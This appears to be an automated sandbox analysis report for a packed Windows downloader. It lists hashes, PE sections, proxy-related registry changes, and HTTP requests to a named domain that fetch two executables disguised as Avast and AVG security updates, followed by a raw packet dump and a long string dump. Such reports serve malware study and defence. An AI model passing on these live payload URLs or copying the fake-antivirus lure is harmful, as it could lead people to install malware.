Analysis Date: 2014-10-07 01:29:40
MD5: a95872a4900cb20d3030d749cace5e0c
SHA1: c575ba2711645e09259bf510fac74f8985413ff1

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: CODE md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section: DATA md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section: BSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section: .idata md5: 35178448d4578a980f9aba55a38e38b0 sha1: a4c2afe2dd3df0a63a0efe3a559aac6779ea882d size: 8192
Section: .tls md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section: .rdata md5: de85a91d4020adeb5b34c6aceb8dee5e sha1: 4b61908990e759713c25ecb6c0929413dd3c4c2a size: 512
Section: .delete md5: 25544bbda2867b3c4df48e2b929dac94 sha1: 8be9f5bc4d7d5103b6b8544e0b967e5501c7565e size: 512
Section: .rsrc md5: 5863a3c0dc89e04365d04239a02ad31a sha1: 5fd90358e5226f735c9285eee34c144981567bfb size: 30208
Section: .pklstb md5: 4cf64bc626e6162d6860602369e439ae sha1: 857575d03dfd2e208705017b82343c5e1b04495f size: 200192
Section: .relo2 md5: 7ebaecdcb587569f3e9a365fcd2b2fe3 sha1: e88813a6600e67bfbd00a848ab7d9249233ea942 size: 512
(Sections with size 0 carry the MD5/SHA1 of empty input; those hash values are not specific to this sample.)
Timestamp: 1992-06-19 22:22:17 (the fixed default written by Borland Delphi linkers, so it does not date the build)
Version:
LegalCopyright:
InternalName:
FileVersion: 1.0.0.0
CompanyName:
LegalTrademarks:
ProductName:
ProductVersion: 1.0.0.0
FileDescription:
OriginalFilename:
Packer: PKLITE32 1.1
PEhash: 19d3471753cb127dbfa8d48acebdb996a57a853d
IMPhash: abbfbd1df80ab2b9bf845c919f3183b5

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Winsock DNS: forumdistrital.com
Winsock URL: http://forumdistrital.com/boy2014musicas/avastsecuritversao.exe
Winsock URL: http://forumdistrital.com/boy2014musicas/avgsecuritversao.exe

Network Details:

DNS: forumdistrital.com
Type: A
50.23.134.43
HTTP GET: http://forumdistrital.com/boy2014musicas/avastsecuritversao.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://forumdistrital.com/boy2014musicas/avgsecuritversao.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 50.23.134.43:80
Flows TCP: 192.168.1.1:1033 ➝ 50.23.134.43:80

Raw Pcap
0x00000000 (00000)   47455420 2f626f79 32303134 6d757369   GET /boy2014musi
0x00000010 (00016)   6361732f 61766173 74736563 75726974   cas/avastsecurit
0x00000020 (00032)   76657273 616f2e65 78652048 5454502f   versao.exe HTTP/
0x00000030 (00048)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000040 (00064)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x00000050 (00080)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x00000060 (00096)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000070 (00112)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000080 (00128)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000090 (00144)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x000000a0 (00160)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x000000b0 (00176)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x000000c0 (00192)   20666f72 756d6469 73747269 74616c2e    forumdistrital.
0x000000d0 (00208)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x000000e0 (00224)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f626f79 32303134 6d757369   GET /boy2014musi
0x00000010 (00016)   6361732f 61766773 65637572 69747665   cas/avgsecuritve
0x00000020 (00032)   7273616f 2e657865 20485454 502f312e   rsao.exe HTTP/1.
0x00000030 (00048)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000040 (00064)   41636365 70742d45 6e636f64 696e673a   Accept-Encoding:
0x00000050 (00080)   20677a69 702c2064 65666c61 74650d0a    gzip, deflate..
0x00000060 (00096)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000070 (00112)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000080 (00128)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000090 (00144)   696e646f 7773204e 5420352e 313b2053   indows NT 5.1; S
0x000000a0 (00160)   56313b20 2e4e4554 20434c52 20322e30   V1; .NET CLR 2.0
0x000000b0 (00176)   2e353037 3237290d 0a486f73 743a2066   .50727)..Host: f
0x000000c0 (00192)   6f72756d 64697374 72697461 6c2e636f   orumdistrital.co
0x000000d0 (00208)   6d0d0a43 6f6e6e65 6374696f 6e3a204b   m..Connection: K
0x000000e0 (00224)   6565702d 416c6976 650d0a0d 0a0d0a     eep-Alive......


Strings
.
>
040904E4
1.0.0.0
BBABORT
BBALL
BBCANCEL
BBCLOSE
BBHELP
BBIGNORE
BBNO
BBOK
BBRETRY
BBYES
CompanyName
DLGTEMPLATE
DVCLAL
FileDescription
FileVersion
InternalName
LegalCopyright
LegalTrademarks
MAINICON
OriginalFilename
PACKAGEINFO
PLATFORMTARGETS
PREVIEWGLYPH
ProductName
ProductVersion
StringFileInfo
TQCNHQ0
Translation
VarFileInfo
VS_VERSION_INFO
~@_^][
=	= =(=~=
;	<(<:<
?/?>?{?
"""""/
""""""
""""""""
"""""""""""
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0p0
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0x0
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0l0w0{0
0 0$0(0,0004080<0@0D0O0[0b0m0
0 0$0(0,0004080<0@0D0R0Z0b0j0r0z0
0 0$0(0,0004080<0L0l0t0x0|0
0 0$0(0,00040D0d0l0p0t0x0|0
0 0%0.040I0W0]0h0
&000:0C0S0b0l0
0 0-010D0d0l0p0t0x0|0
0"0*020:0B0J0R0Z0b0j0r0z0
0 0)050>0J0S0_0d0o0z0
0:0\0a0{0
0#0>0J0R0d0
0$0?0Q0k0
0(0<0T0h0|0
001D1g1t1
0$060F0S0_0l0~0
0(090E0Y0g0v0
<0@0D0,181<1`1d1
0$0D0L0P0T0X0\0`0d0h0l0p0t0x0|0
!0;0E0
0,0M0\0s0
)01070C0K0
0$1)11161K1P1X1v1
?0,171c2i2y2
0	1k1v1
%030R122D2Y2n2
?$?(?,?0?4?8?<?@?D?H?\?l?|?
; ;$;(;,;0;4;8;<;@;D;H;L;`;
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>~>
= =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?z?
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>h>x>
= =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=j=r=z=
< <(<,<0<4<8<<<@<D<H<V<h<
> >$>(>,>0>4>8>L>a>e>s>w>{>
< <$<(<,<0<4<8<<<@<N<V<l<
= =$=(=,=0=4=D=]=
=$=(=0=4=<=@=H=L=T=X=`=d=l=p=
=0>5>A>T>Y>f>
?(?0?5?[?z?
; ;(;0;8;@;H;P;X;`;h;p;x;
: :(:0:8:@:H:P:X:`:h:p:x:
,090b0
,0@A@S
^0b0f0j0n0r0v0z0~0
$0B0n0
0CQQoj
0-ga4?
< <,<0<<<@<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
 <0Kq'
;%;0;@;K;V;f;r;
=!=&=0=@=K=X=]=
0N0S0m0
0n2X;Q
=#=0===O=T=o=|=
; ;$;(;,;0;P;p;x;|;
>0>P>s>
?"?&?*?0?P?x?
<0<@<P<X<\<`<d<h<l<p<t<x<|<
>0>P>X>\>`>d>h>l>p>t>x>
0pX,og
= =$=(=,=0=U=c=r=
)0W041
0y1.2.3
)0Z0k0
0Zm[3%
101J1T1^1h1w1
10P0s0|0
1+101:1@1H1
1(1014181<1@1D1H1L1P1d1
1 101A1E1V1^1
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1t1
1 1$1(1,1014181<1@1D1H1L1X1c1g1~1
1 1$1(1,1014181<1L1l1t1x1|1
1"1&1*1.12161:1>1B1F1J1N1R1V1Z1^1b1f1j1n1r1v1z1~1
1'111;1Q1w1
1'11161;1@1E1K1P1U1[1b1h1o1u1|1
1"1*121:1B1J1R1Z1b1j1r1z1
1'1/1b1
1.1=1N1
	11282
1$161>1I1N1Y1`1
1&191C1
1/1B1K1f1y1
1$1C1s1
1<1D1H1L1P1T1X1\1`1d1h1l1p1t1
1'1L1W1
1:1p1}1
1/2=2K2Y2v3
1'3[4B5x5
141A1K1\1a1q1x1
>!>%>)>->1>5>9>=>A>E>I>M>Q>U>Y>]>a>e>i>m>q>
161:1>1B1F1J1N1\1k1o1}1
;1<9<?<K<R<
1A1I1M1c1k1o1
1c>zX[S
1e1i1m1
^1g1q1
;1;@;j;
1L].0b\I
1S5q,F
:;;+<1<T<Z<
>,>1>W>\>
2$2,2024282<2@2D2H2L2`2
2$2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
2 2(20282@2H2P2X2`2h2p2x2
2 2%212;2A2I2j2r2
2'2-21272;2A2E2K2O2U2Y2_2c2i2m2s2w2
2 2$2,20282<2D2H2P2T2c2o2
2"222>223:3K3W3a3J4P4[4z5<6@6D6H6L6P6T6u8
2"2*222:2B2J2R2Z2b2j2r2z2
2 2$2(2,272C2J2T2^2h2s2}2
2!2'2@2`2h2l2p2t2x2|2
2&2.262
2&2.262>2F2N2V2^2f2n2v2~2
2	2(292W2^2q3
2"2@2D2H2L2b2f2j2n2
2%2.2L2R2Z2
2+2:2Q2
2&232?2L2^2f2s2
2(282@2H2P2X2`2h2p2x2
2%2C2e2t2
2(2H2P2T2X2\2`2d2h2l2p2
2'2I2W2^2v2}2
2&2i2z4
2!303G3
2"3-353D3X3f3n3}3
2&3T3h3
252=2U2]2a2w2
252=2V2b2u2
263N3q3
>">&>*>.>2>6>:>>>B>F>J>N>R>V>Z>^>b>f>j>n>r>v>z>~>
= =&=2=7=B=G=L=W=\=a=l=q=v=
< <%<2<7<D<I<V<[<h<m<z<
292_2l2{2
>">*>2>:>B>J>R>Z>b>j>r>z>
?"?*?2?:?B?J?R?Z?b?j?r?z?
[2bO]~1|
:	:(:2:d:
2F3*4h4
2F3V3"4?4(686Y6q6%7D7a7
:!:2:?:F:J:P:T:Z:a:e:
{2.H$,
:*:.:2:I:M:Q:l:|:
;*;.;2;J;N;R;l;|;
2L2W2e2
$2 w5j*
2X2`2h2p2x2
30395=5A5E5I5M5Q5U5Y5]5a5e5i5m5q5u5y5}5
314r4y4
323:3B3J3R3Z3b3j3s3
324?4]4
3&313C3V3{3
3*323P3X3\3p3x3
3 3(30383@3H3P3X3`3h3p3x3
3"3*323:3B3J3R3Z3b3j3r3z3
3$3+3}3
3 3$3(32363H3Y3]3
3 3$3(3,3034383<3@3D3H3L3d3t3
3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
3#3'3+3/333.4T4x4
3#3.333>3C3N3S3e3t3
3 3$3,3@3H3L3P3T3X3\3`3d3h3v3~3
3#3/3<3N3[3g3t3
3 3(3D3b3
3!3;3k3
3'3;3x3
3*363P3\3o3w3{3
3*373C3J3\3n3y3
3$3A3^3
3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
3=3h3w3
3(3K3z3+4G4
3-4;4@4K4Q4V4a4g4l4w4}4
3$464\4|4
3^4r4z4
363Z3b3h3n3
37!aN<
<3=7=;=?=C=G=K=g=
;#;';+;/;3;8;
383@3D3H3L3P3T3X3\3`3t3
383I3l3
3B4W4z4
=!=.=3=@=E=R=W=d=i=v={=
>(>3>=>H>R>]>g>r>|>
3I>0o5
3M5Q5U5Y5]5a5e5i5m5q5u5y5}5
?3|R\<T
<	=3>@>s>y>
3W3;4{5
<3<X<d<y<
40>0R0W0c0w0
404G4X4
4$40444@4D4L4P4T4X4\4`4d4h4l4p4t4x4|4
4$4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
4 4(40484@4H4P4X4`4h4p4x4
4"4*424:4B4J4R4Z4b4j4r4z4
4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
4$4(4,404H4^4b4s4{4
4"4'454>4C4H4V4_4d4i4w4
4*474C4K4T4\4o4
4+474M4U4r4z4~4
4"484@4N4`4p4y4
4%4B4J4b4n4
4-4D4T4
4?4f5v5
4*4H4c4g4x4
4(4H4P4T4X4\4`4d4h4l4p4
4.5:5D5T5m5
4 585\5u5
4?5D5{5
4@5J5d5
476N6U6
=(=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
< <(<,<4<8<@<D<L<P<X<\<d<h<p<t<|<
4CJG%o
4D4K4Z4a4
?$?4?D?L?P?T?X?\?`?d?h?l?p?t?x?|?
>$>,>4><>D>L>T>\>d>l>t>|>
4e4p4y4
:':4:F:N:V:^:f:n:v:~:
<4=\=k=
:#:4:L:
4L4T4\4d4l4t4|4
4P5T5X5\5`5d5h5l5p5t5x5|5
.4pETW
>4?R?_?
> >$>4>T>\>`>d>h>l>p>t>x>|>
;!;+;5;
51595P5X5p5x5
535>5G5U5h5
5"5*525:5B5J5R5Z5b5j5r5z5
5'5-525=5C5H5S5Y5^5i5o5t5
5$5,545<5D5L5T5\5d5l5t5|5
5&5*5.525H5_5c5t5
5$5+555
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5
5 5$5(5,50545B5J5&6*6.62666:6>6B6F6J6N6R6V6Z6^6b6f6j6n6r6v6z6~6
5 5$5(5,5@5`5h5l5p5t5x5|5
5 5$5(5<5\5d5h5l5p5t5x5|5
5!5)5-5@5L5e5m5q5
5 5.5>5B5F5P5[5_5m5
5%5*5[6g6t6
5 5?5b5j5t5y5
5&5:5D5W5
5+5=5U5
5.5E5p5
5/636V6Z6
5$646@6D6L6P6T6X6\6`6d6h6l6p6t6x6|6
5-646V6
565R5[5x5
5]6d6&7
5-6g6v6}6
5B5j5z5
?5?C?R?i?
>(>5>G>L>d>
5.i$X$v
5[:k:c<s<
\=[_5K_=[W5KW=
5o?^ENN
;);5;O;[;s;
5R6t6	7
:$:5:@:S:
5&S%,D
5u%f 1R
:!:+:5:?:U:[:i:|:
:5:W:^:
607E8r8
616@6y7
646C6H6h6x6
(6*|4F3>
6#60646<6P6X6\6`6d6h6l6p6t6x6
6)616L6l6t6x6|6
6$63676E6I6M6k6o6s6
6$6(6064686<6@6D6H6L6P6X6h6
6$6+61696O6Z6o6y6
6"6*626
6'6/636K6S6W6n6z6
6$6,646<6D6L6T6\6d6l6t6(7,70747<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7
6 6$6(6,6064686<6@6D6H6L6P6T6h6{6
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
6 6$6(6,6064686<6@6D6H6L6P6T6X6l6
6*6:6@6`6h6l6p6t6x6|6
6#6.6@6R6c6m6~6
6#6/676
6-696>7`7
6-6d6v6|6
6!7)7-7I7Q7U7k7s7w7
6#7(7P7_7
6]7d7{7b9v9
6;7G7T7f7
697H7Q7z7
6e7A8f8
:.:6:E:O:Z:_:l:|:
>(6eu?
:6:^:f:
;$;);6;;;H;M;Z;_;l;q;~;
6I8R8u8~8
6j8t8|8
;-;6;>;K;Q;Y;j;s;~;
;6Q8y}Z
?+?6?W?m?
<$<6<X<h<x</=;=g=s=
: ;%;7;^;_<
707>7Q7e7
707F7J7`8m8
767=7G7M7T7^7c7i7n7t7y7
7 707=7
7+737N7V7r7z7
7!7)747F7V7^7m7w7|7
7 7$7(7,7074787<7@7D7H7
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7h7
7 7$7(7,7074787<7@7R7V7Z7^7b7f7
7"7&7*7.72767:7>7B7F7J7N7R7V7Z7^7b7f7j7n7r7v7z7~7
7#7(7-777<7A7c7o7|7
7 7$7(7,7:7B7J7X7\7p7
7#7)777=7K7V7j7{7
7(7,7H7P7T7X7\7`7d7h7l7p7
7#7+7L7p7
7(7B8~9
77s/	9
7-7X7b7l7t7
7+8o8{8
7;9m9d:I<M<Q<U<Y<]<a<e<i<
7ceL)WdiX
=7>;>C>H>
7HD$!R
7I8f8u8
7L8`8m8
=">*>7>>>L>W>]>v>
%7@/tF;^
7vvRZ~p9e
?7?X?x?
7z8a;l;"<
818H9u9
819i9{9a:
:85T0S-
878?8L8Q8W8
8 828<8I8U8^8d8q8}8
8 8$8(8
8$8(8,8084888<8@8D8H8L8P8d8
8 8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
8 8$8(8,8084888<8@8D8H8`8x8|8
8 8$8(8,8084888<8@8D8H8L8P8T8X8
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
8 8$8(8,8084888<8@8D8T8t8|8
8,888<8D8H8L8P8T8X8\8`8d8h8l8p8x8
8!8-8C8O8e8q8
8#8,8T8]8f8l8}8
8.8A9P9{9
8;8c8u8
8:9A9S:
8#9Q9t9
8a8e8i8m8t8
;';.;8;B;L;X;c;t;z;
8B;&oFv
>8>C>Z>z>
;8;@;D;H;L;P;T;X;\;`;d;h;l;p;t;
8I_7T]D
:8ib!ro
?(?8?I?V?x?
8k9o9s9w9{9
8/	kq^
>$>8>L>`>t>
8'}MEO
8o9<:[: <O<
8p94:;:
8tLBC!
8V8h8t8
8X8m8t8
? ?$?(?8?X?`?d?h?l?p?t?x?|?
8Y9i9):
90:?:~:
90:4:8:<:@:
909D9H9\9l9x9|9
929h9{9
979G9~9
9"909l9
9+979O9[9v9
9 9(90989@9H9P9X9`9h9p9x9
9$9+92999@9G9N9U9\9c9j9q9x9
9 9$929V9Z9^9|9
9%9-959=9
9 9(9,94989@9D9L9P9X9\9d9h9p9t9|9
9 9$9(9,9094989<9@9D9H9P9T9\9`9d9h9l9p9t9x9|9
9 9$9(9,9094989<9@9D9R9^9h9s9w9
9 9$9(9,9094989<9X9x9
9 9$9(9,9094989L9l9t9x9|9
9"9&9*9.92969:9>9B9F9s:z:
9/9>9X9e9i9
9'9X9_9
;9;=;D;
9]e^\Q_
<9<><e<r<
9!:F:R:
9i:3;};
9::K:n:
;$<9<N<S<`<
9;`v'B
9*:::W:p:
ActivateKeyboardLayout
AdjustWindowRectEx
advapi32.dll
a?	feC
aJ12cL3
aJ14dM4
aJ19fN6
AJ$^b6
</assembly>
      <assemblyIdentity
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
+axhzUe
axwLAR((
B/4NuO>
"+]$B6
`B9XJ&
&BC3Z!D
 Bc'@r
bD)'3{6
~B-dc[0
<b]dWB
BeginPaint
BitBlt
B[$Iy_w
bK10`I1l`I1
B^OQ,s
b>($Pf
B.rsrc
:B##=w
BwG,]z
>B?Z?i?v?{?
<!<<<c<
C6(_s_I
CallNextHookEx
CallWindowProcA
CeID"L
;!;;;C;^;f;
CharLowerA
CharNextA
CharToOemA
CheckMenuItem
cI/:_r
 ck_CO
cL2<cL3
cL3HgO8
cL3=jS:
ClientToScreen
CloseHandle
cM3HkT;
cN8{_J5OP?-
&C<[;O.
comctl32.dll
CompareStringA
Couldn't allocate memory!
CreateBitmap
CreateBrushIndirect
CreateCompatibleBitmap
CreateCompatibleDC
CreateDIBitmap
CreateDIBSection
CreateEventA
CreateFileA
CreateFontIndirectA
CreateHalftonePalette
CreateIcon
CreateMenu
CreatePalette
CreatePenIndirect
CreatePopupMenu
CreateSolidBrush
CreateThread
CreateWindowExA
cSC"lWB
)c{w^`
?/?C?w?
cxM`g2
""""""""D{
D6)hjVB
d:az(,
}D////D}{
{}DD////DDb
DDffgw
DDGwwwwwwwww
DDpwwwwwwww
DefFrameProcA
DefMDIChildProcA
DefWindowProcA
DeleteCriticalSection
DeleteDC
DeleteMenu
DeleteObject
  </dependency>
  <dependency>
    </dependentAssembly>
    <dependentAssembly>
DestroyCursor
DestroyIcon
DestroyMenu
DestroyWindow
dFfffw
DFfff`wx
Dfffpwwwwxh
Dfff`w
{}D/GG1101011GGD`{xw
}DGGD}
<<<D<H<L<P<T<X<\<`<d<
DHwwwwxo
DispatchMessageA
/diZk0
<$<(<D<L<P<T<X<\<`<d<h<l<p<t<x<|<
dM4whQ8
dM68hQ:
DO@wwwwwwwww
D$p_^]
Dpwwxgw
)dr)8%	
DrawEdge
DrawFrameControl
DrawIcon
DrawIconEx
DrawMenuBar
DrawTextA
$dSZin
duBJ07E
^dV53`%
d,wa"z	o
Dxjcwr*
Dy/5Ak
=E>a>h>
E<BjXX
`E"FV?!wS>"wQ<!
eG]5!L;l 
Eg$Y5y
<(<@<e<l<
ElaV.SY
+EM1v9
eM4VjS;
EM{v3c4
;$<E<N<
eN4zkT<
eN77kT=
eN78kT=
EnableMenuItem
EnableScrollBar
EnableWindow
EndPaint
EN]Fm]
:);e;n;s;|;
EnterCriticalSection
EnumCalendarInfoA
EnumThreadWindows
EnumWindows
eO]F\L
;E;];p;
EqualRect
eQ:w')
:E;R;b;|;
eSB2lWB
>E>S>b>y>
<=<E<S<s<
E.' uMA5
ExcludeClipRect
ExitProcess
explode returned %d
<&<f<|<
,f37	~p
f%ae8y
@fbygB
Ffdpwwwwww
ffffff
ffffffff
FFpwwwx
fgK!wmQ(
f,]\\I^
FillRect
FindClose
FindFirstFileA
FindResourceA
FindWindowA
<f=j=n=r=v=|=
;f<j<v<|<
fn+-	\`[Iy
FormatMessageA
;F;p;~;
Fpwwwwwwwwww
FqZ98NgT
FrameRect
FreeLibrary
FreeResource
FRot%6
F-TQXl
?+?f?y?
FZ>A*P
<%<;<g<
"""""""""G
{}/G011
g0(o,L,ze
G9)!oYD
}ga'K:
gdi32.dll
GetACP
GetActiveWindow
GetBitmapBits
GetBrushOrgEx
GetCapture
GetClassInfoA
GetClassNameA
GetClientRect
GetClipBox
GetCommandLineA
GetCPInfo
GetCurrentPositionEx
GetCurrentProcessId
GetCurrentThreadId
GetCursor
GetCursorPos
GetDateFormatA
GetDCEx
GetDCOrgEx
GetDesktopWindow
GetDeviceCaps
GetDIBColorTable
GetDIBits
GetDiskFreeSpaceA
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetFocus
GetForegroundWindow
GetFullPathNameA
GetIconInfo
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardState
GetKeyboardType
GetKeyNameTextA
GetKeyState
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetLocalTime
GetMenu
GetMenuItemCount
GetMenuItemID
GetMenuItemInfoA
GetMenuState
GetMenuStringA
GetModuleFileNameA
GetModuleHandleA
GetObjectA
GetPaletteEntries
GetParent
GetPixel
GetProcAddress
GetPropA
GetScrollInfo
GetScrollPos
GetScrollRange
GetStartupInfoA
GetStdHandle
GetStockObject
GetStringTypeExA
GetSubMenu
GetSysColor
GetSysColorBrush
GetSystemInfo
GetSystemMenu
GetSystemMetrics
GetSystemPaletteEntries
GetTextExtentPoint32A
GetTextMetricsA
GetThreadLocale
GetTickCount
GetTopWindow
GetVersion
GetVersionExA
GetWindow
GetWindowDC
GetWindowLongA
GetWindowOrgEx
GetWindowPlacement
GetWindowRect
GetWindowTextA
GetWindowThreadProcessId
GgPPTL
G.}i Hk
gi=&HO
GlobalAddAtomA
GlobalAlloc
GlobalDeleteAtom
GlobalFindAtomA
GlobalFree
GlobalHandle
GlobalLock
GlobalReAlloc
GlobalUnlock
;G;N;e;
, gnh(
gO8ynXA
>%?G?o?x?
gP8@nW@
H.@/)@
+H@<0=
]H8(3h
H9*Sr]H
hBW9u-sS9
h:faYzv
{HHdgY>
hkm@~q
? ?$?(?,?@?`?h?l?p?t?x?|?
: :@:H:L:P:T:X:\:`:d:h:
< <,<@<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
= =@=H=L=P=T=X=\=`=d=h=x=
>h>l>t>x>
h,)n$Y
=(=H=P=T=X=\=`=d=h=l=p=
(h|q[|q+
hR:HgQ:vhQ:
:,:`:h:s:
+hS0XA
:HTl/8
hwwwwwpw
hwwwwww
hwwwwwwp
>$>H>Y>
>i*-+=
^I+2`K.G
)I4.+=
[I5avaK
`I9(Xc
Iad'Qj
i}/A/U
.idata
ImageList_Add
ImageList_BeginDrag
ImageList_Create
ImageList_Destroy
ImageList_DragEnter
ImageList_DragLeave
ImageList_DragMove
ImageList_DragShowNolock
ImageList_Draw
ImageList_DrawEx
ImageList_EndDrag
ImageList_GetBkColor
ImageList_GetDragImage
ImageList_GetIconSize
ImageList_GetImageCount
ImageList_Read
ImageList_Remove
ImageList_ReplaceIcon
ImageList_SetBkColor
ImageList_SetDragCursorImage
ImageList_SetIconSize
ImageList_Write
InflateRect
i*Ng8N
InitializeCriticalSection
InsertMenuA
InsertMenuItemA
<I=N=S=g=
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
IntersectClipRect
IntersectRect
InvalidateRect
^IP~	Ji5
iq\Qe.0
`iQthj
iR:DjS;
IsChild
IsDialogMessageA
IsIconic
iS=)iR<_gQ;
IsRectEmpty
IsWindow
IsWindowEnabled
IsWindowVisible
IsZoomed
&It\FG
-?iTVq8
_@Iyo>
}	<J0'^
J/;|+3
J62Gaq)0
JB_t_HW
jCo~"G
JH}.j.
jkPl3f
`jP<<^
Jq)Irj
	jSA~j
~%j=tt
jUG|gSw
/K.*^=
`K7hVD22
kernel32.dll
K/GM/k
<@<K<h<r<
KillTimer
KiW"ks>
>K>N?l?
>?>K>R>]>g>q>{>
KsvYaq
^^KU3	
kU=wlV>
#kv+Tr
[Kwg?3=
l[}\9/
lAG*w~
        language="*"
LeaveCriticalSection
          level="asInvoker"
LIf+pU[J
LineTo
~Lja%v
L`[LGm
Lmo'G$
lNe">/@
Ln$)m&
LoadBitmapA
LoadCursorA
LoadIconA
LoadKeyboardLayoutA
LoadLibraryA
LoadLibraryExA
LoadResource
LoadStringA
LocalAlloc
LocalFree
LockResource
lp{gd1K)
:*:?:L:Q:^:c:p:u:
=-=L=Q=V=[=`=
"lS(j+
lstrcpyA
lstrcpynA
lstrlenA
LTBTb~
l|u9}S"l`
m	_=${
MapVirtualKeyA
MapWindowPoints
MaskBlt
m,B;-~
M@BLPu
MemExpReadIt  % 6d / % 6d / % 6d / % 6d
MemExpWriteIt % 6d / % 6d
MessageBoxA
%m-:j6
;M"j -=6
MK`tG9f
m}m7(W+
m_nCompressedBufSize = %d 
m_nCompressedPosition = %d
m_nOriginalPosition = %d  
MoveToEx
{(m)UjQ
MulDiv
MultiByteToWideChar
M>/|vaM
 /("MWK?
mW?wnYB
<@<M<Z<o<t<
_|n1A_
N5Ypg0
/n6JU|
]n7ll<^h
        name="Microsoft.Windows.Common-Controls"
;$;N;b;
ne\tO/
nG]#uSRC
n\Hhs^G
#Ni'DQo 
nry?;^
nr##zW
NW0Z4$
<N=Y=x=
;N<Z<c<h<t<}<
Nze-YIOV
=$=<=o=
'O1 (ER
O2u>tF
O#>\58,
O$`8-`
)o+a]I
)oB~0Jd
oDZF^M?
OemToCharA
OffsetRect
`_O:?h
?/?O?[?h?z?
+;oIn&
O;&L."
oleaut32.dll
OL.reC
! ]OsQ
O]\T\M
:+;o;v;
#Ov%w	
	oZD[mW?
\ozh)	
p4yxNi"
PatBlt
$pCD1M
P.delete
PeekMessageA
p[E)hR9
p[F_lU>
=P=]=f=o=
>/>@>P>f>r>
@(#)PKLITE32 Copyright 1998 PKWARE Inc., All Rights Reserved ($Revision: $)
.pklstb
PKLT32
PL"'#{
PostMessageA
PostQuitMessage
        processorArchitecture="*"/>
PtInRect
        publicKeyToken="6595b64144ccf1df"
P<uN**2
=&pW0m
PWh-|I
pwwwwww
pwwwwwwwww
pwwwwwwwwxo
=P=X=^=j=r=
P!%Yh]
P^:Yn~ 
>#>Q>^>{>
;	<)<Q<
?Q6o2~l
!q7m]w
Q>9*]o
? ?*?<?Q?\?a?f?s?
QcM<v?0
Q/,:D)E
